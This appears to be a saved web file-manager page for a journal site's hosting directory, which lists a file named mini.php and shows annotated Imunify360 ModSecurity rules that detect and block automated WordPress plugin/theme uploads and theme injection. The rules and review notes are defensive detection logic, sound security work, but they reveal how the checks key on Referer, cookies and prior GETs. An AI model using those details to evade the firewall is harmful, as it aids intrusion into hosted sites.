File Manager
Current Directory: /home/lartcid/public_html/journal.lartc.id
.htaccess
.well-known
README.md
api
cache
cgi-bin
classes
config.TEMPLATE.inc.php
config.inc.php
controllers
cypress.json
dbscripts
docs
error_log
favicon.ico
index.php
js
lib
locale
mini.php
pages
php.ini
plugins
public
registry
scheduledTaskLogs
schemas
styles
templates
tools
Edit File
# ------------------------------------------------------
# Imunify360 ModSecurity Rules
# Copyright (C) 2024 CloudLinux Inc All right reserved
# The Imunify360 ModSecurity Rules is distributed under
# IMUNIFY360 LICENSE AGREEMENT
# ------------------------------------------------------
#
# Reading notes for this rule set:
#  * Each rule below is a chain: the first SecRule carries the id, the
#    disruptive action and the msg; every following SecRule up to the first one
#    without "chain" must also match for the chain to fire.
#  * "block" defers to the disruptive action of the active SecDefaultAction,
#    which is not defined in this file.
#  * State is shared between rules through TX (per request) and IP (per source
#    address) variables, so the order of the rules matters.
#  * tx.remote_addr, tx.wp_user, ip.wp_logged_in and ip.wp_auto_install are
#    read here but never set here; presumably other rule files set them -
#    TODO confirm.

# WORDPRESS INITIATE
# Track get action
# Opens the per-IP collection (initcol) and, when that IP is already flagged as
# logged in, sets ip.wp_get_req=1 with a 600-second expiry. The block rules
# further down read the absence of this flag as "POST without a preceding GET".
# No operator is given for "GET", so the implicit @rx applies and the match is
# unanchored.
SecRule REQUEST_METHOD "GET" "id:77316804,chain,pass,nolog,severity:5,t:none,msg:'IM360 WAF: Track get action||T:APACHE||',tag:'service_im360',tag:'noshow',initcol:ip=%{tx.remote_addr}"
    SecRule IP:wp_logged_in "@eq 1" "t:none,setvar:ip.wp_get_req=1,expirevar:ip.wp_get_req=600"

# Blocks a POST to /wp-admin/update.php with action upload-plugin or
# upload-theme when ip.wp_auto_install is 1 and a wordpress_logged_in_* cookie
# is present. The cookie's leading field (everything before the first "|") is
# copied to tx.log_cookie_350110, and the last link stores a value derived with
# t:sha1,t:hexEncode in tx.log_cookie_sha_350110; both appear in the log line.
# NOTE(review): no phase is given here, unlike 77316805 below, so the phase
# comes from SecDefaultAction - confirm it is phase 2 so that ARGS is populated.
# NOTE(review): this chain has no initcol of its own, and the initcol in
# 77316804 only runs for GET requests; confirm the IP collection is opened
# elsewhere before a POST reaches this rule.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/update.php" "chain,id:77350110,block,log,severity:2,t:none,t:normalizePath,msg:'IM360 WAF: WordPress plugin/theme auto install block||WPU:%{tx.log_cookie_350110}||Hash:%{tx.log_cookie_sha_350110}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||Logged:%{IP.wp_logged_in}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core'"
    SecRule REQUEST_METHOD "^POST$" "chain,t:none"
    SecRule ARGS:action "@rx upload-(?:plugin|theme)" "chain,t:none"
    SecRule IP:wp_auto_install "@eq 1" "chain,t:none"
    SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "@rx ^([^\|]+)\|" "chain,t:none,t:urlDecode,capture,setvar:tx.log_cookie_350110=%{TX.1}"
    SecRule TX:log_cookie_350110 "!@rx ^$" "t:none,t:urlDecode,t:sha1,t:hexEncode,capture,setvar:tx.log_cookie_sha_350110=%{MATCHED_VAR}"

# MALICIOUS PLUGIN/THEME INSTALL
# Track upload
# Audit-only (pass,nolog,auditlog): marks the transaction with
# TX.wp_plugin_upload=1 when a plugin or theme archive is POSTed to update.php.
# Rules 77316805 and 77316819 depend on this flag, so this rule must stay
# ahead of them.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/update.php" "id:77316759,chain,phase:2,pass,nolog,auditlog,severity:5,t:none,t:normalizePath,t:lowercase,msg:'IM360 WAF: WordPress plugin/theme install. Track upload||SC:%{SCRIPT_FILENAME}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'"
    SecRule REQUEST_METHOD "^POST$" "chain,t:none"
    SecRule ARGS:action "@rx upload-(plugin|theme)" "t:none,t:lowercase,setvar:TX.wp_plugin_upload=1"

# Block malicious upload
# Blocks the flagged upload when the source IP is marked logged in but has no
# ip.wp_get_req entry (the &-count is 0), i.e. rule 77316804 recorded no GET
# from that IP within the last 600 seconds. The last two links only build the
# WPU/Hash log fields, but the chain still needs a wordpress_logged_in_* cookie
# to match.
# NOTE(review): the heuristic is keyed on the source address, so clients behind
# one NAT or proxy share the same flags; expect both false negatives and false
# positives there.
SecRule TX:wp_plugin_upload "@eq 1" "id:77316805,chain,block,log,phase:2,severity:2,t:none,initcol:ip=%{tx.remote_addr},msg:'IM360 WAF: WordPress plugin/theme install. Block automated upload||SC:%{SCRIPT_FILENAME}||WPU:%{tx.log_cookie_316805}||Hash:%{tx.log_cookie_sha_316805}||Time:%{TIME}||Addr:%{tx.remote_addr};login:%{IP.wp_logged_in};get:%{IP.wp_get_req};upl:%{TX.wp_plugin_upload}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core'"
    SecRule IP:wp_logged_in "@eq 1" "chain,t:none"
    SecRule &IP:wp_get_req "@eq 0" "chain,t:none"
    SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "@rx ^([^\|]+)\|" "chain,t:none,t:urlDecode,capture,setvar:tx.log_cookie_316805=%{TX.1}"
    SecRule TX:log_cookie_316805 "!@rx ^$" "t:none,t:urlDecode,t:sha1,t:hexEncode,capture,setvar:tx.log_cookie_sha_316805=%{MATCHED_VAR}"

# Automatic plugin installation w/o referer
# Audit-only: records uploads whose Referer does not contain the plugin upload
# page.
# NOTE(review): the last link inspects an existing Referer value; a request with
# no Referer header at all presumably gives it nothing to evaluate, and that
# case is handled by 77316819 instead. The expected path names only
# plugin-install.php, so an upload-theme request is likely recorded here as
# well - confirm that is intended.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/update.php" "id:77350099,chain,pass,nolog,auditlog,severity:5,t:none,t:normalizePath,t:lowercase,msg:'IM360 WAF: WordPress plugin/theme install. Track referer||SC:%{SCRIPT_FILENAME}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'"
    SecRule REQUEST_METHOD "^POST$" "chain,t:none"
    SecRule ARGS:action "@rx upload-(plugin|theme)" "chain,t:none"
    SecRule REQUEST_HEADERS:Referer "!@contains /wp-admin/plugin-install.php?tab=upload" "t:none,t:normalizePath"

# WP THEME INJECTION (TIMING & BEHAVIOUR)
# Track theme edit
# Audit-only: sets TX.wp_theme_edit=1 for a POST to admin-ajax.php or
# theme-editor.php whose action contains edit-theme-plugin-file. Rules 77316869
# and 77316819 depend on this flag.
SecRule REQUEST_URI "@rx \/wp-admin\/(?:admin-ajax|theme-editor)\.php" "id:77316868,chain,pass,nolog,auditlog,severity:5,t:none,t:normalizePath,t:lowercase,msg:'IM360 WAF: WordPress theme edit. Track edit||SC:%{SCRIPT_FILENAME}||File:%{ARGS.file}||Theme:%{ARGS.theme}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core',tag:'noshow'"
    SecRule REQUEST_METHOD "^POST$" "chain,t:none"
    SecRule ARGS:action "@rx edit-theme-plugin-file" "t:none,t:lowercase,setvar:TX.wp_theme_edit=1"

# Block theme injection
# Same shape as 77316805, applied to theme/plugin file edits: blocks when the
# IP is marked logged in, no recent GET was recorded for it, and a
# wordpress_logged_in_* cookie is present.
SecRule TX:wp_theme_edit "@eq 1" "id:77316869,chain,block,log,phase:2,severity:2,t:none,initcol:ip=%{tx.remote_addr},msg:'IM360 WAF: WordPress theme edit. Block malicious injection||SC:%{SCRIPT_FILENAME}||WPU:%{tx.log_cookie_316869}||Hash:%{tx.log_cookie_sha_316869}||Time:%{TIME}||Addr:%{tx.remote_addr};login:%{IP.wp_logged_in};get:%{IP.wp_get_req};edit:%{TX.wp_theme_edit}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core'"
    SecRule IP:wp_logged_in "@eq 1" "chain,t:none"
    SecRule &IP:wp_get_req "@eq 0" "chain,t:none"
    SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "@rx ^([^\|]+)\|" "chain,t:none,t:urlDecode,capture,setvar:tx.log_cookie_316869=%{TX.1}"
    SecRule TX:log_cookie_316869 "!@rx ^$" "t:none,t:urlDecode,t:sha1,t:hexEncode,capture,setvar:tx.log_cookie_sha_316869=%{MATCHED_VAR}"

# BLOCK EMPTY REFERER
# Blocks a flagged upload or edit that carries a non-empty
# wordpress_logged_in_* cookie but no Referer header. "&REQUEST_HEADERS:Referer
# @eq 0" counts headers, so it matches an absent header; a header that is
# present with an empty value counts as 1 and is not matched by this rule.
SecRule TX:wp_plugin_upload|TX:wp_theme_edit "@eq 1" "id:77316819,chain,block,log,phase:2,severity:2,t:none,msg:'IM360 WAF: WordPress plugin/theme install or edit. Block empty Referer||WPU:%{tx.wp_user}||Theme install:%{FILES.themezip}||Theme:%{ARGS.theme}||Plugin:%{FILES.pluginzip}||File:%{ARGS.file}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core'"
    SecRule &REQUEST_HEADERS:Referer "@eq 0" "chain,t:none"
    SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "!@rx ^$" "t:none"

# TRACK WORDPRESS THEME/PLUGIN ACTIVITY
# Audit-only: records POSTs to the listed wp-admin endpoints whose action
# parameter matches the pattern.
# NOTE(review): the pattern is unanchored and groups as
# "upload" | "install-(plugin|theme)", so any action value containing "upload",
# "update" or "activate" matches. It has no capturing group, so "capture" fills
# TX.0 only; the msg prints %{TX.1}, which this chain does not set - the Action
# field is probably empty unless %{TX.0} was intended.
SecRule REQUEST_METHOD "@rx ^POST$" "id:77316925,chain,pass,nolog,auditlog,t:none,severity:7,msg:'IM360 WAF: WordPress theme/plugin activity track||File:%{ARGS.file}||SC:%{SCRIPT_FILENAME}||Action:%{TX.1}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'"
    SecRule REQUEST_FILENAME "@rx \/wp-admin\/(?:admin-ajax|theme-editor|plugin-install|update)\.php" "chain,t:none,t:urlDecodeUni,t:normalizePath"
    SecRule ARGS:action "@rx (?:edit-theme-plugin-file|update|activate|(?:upload|install-(?:plugin|theme)))" "t:none,capture"

# Same tracking, keyed on an "action=..." string in the Referer header instead
# of the request's own action parameter. The TX.1 remark on 77316925 applies
# here too.
SecRule REQUEST_METHOD "@rx ^POST$" "id:77316926,chain,pass,nolog,auditlog,t:none,severity:7,msg:'IM360 WAF: WordPress theme/plugin activity track||SC:%{SCRIPT_FILENAME}||File:%{ARGS.file}||Action:%{TX.1}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'"
    SecRule REQUEST_FILENAME "@rx \/wp-admin\/(?:admin-ajax|theme-editor|plugin-install|update)\.php" "chain,t:none,t:urlDecodeUni,t:normalizePath"
    SecRule REQUEST_HEADERS:Referer "@rx action=(?:edit-theme-plugin-file|update|(?:upload|install-(?:plugin|theme)))" "t:none,capture"

# Audit-only: records theme-customizer requests sent through admin-ajax.php,
# i.e. a POST whose action contains "customize" and that has a non-empty
# argument with "customize" in its name. The msg writes the matched argument's
# name and value (MATCHED_VAR_NAME / MATCHED_VAR) to the audit log, so
# customizer payloads end up there; restrict access to that log accordingly.
SecRule REQUEST_METHOD "POST" "id:77350274,chain,phase:2,pass,nolog,auditlog,severity:5,t:none,msg:'IM360 WAF: Theme customization in WordPress||MVN:%{MATCHED_VAR_NAME}||MV:%{MATCHED_VAR}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core'"
    SecRule REQUEST_FILENAME "@contains /admin-ajax.php" "chain,t:none,t:normalizePath"
    SecRule ARGS:action "@rx customize" "chain,t:none"
    SecRule ARGS:/customize/ "!@rx ^$" "t:none"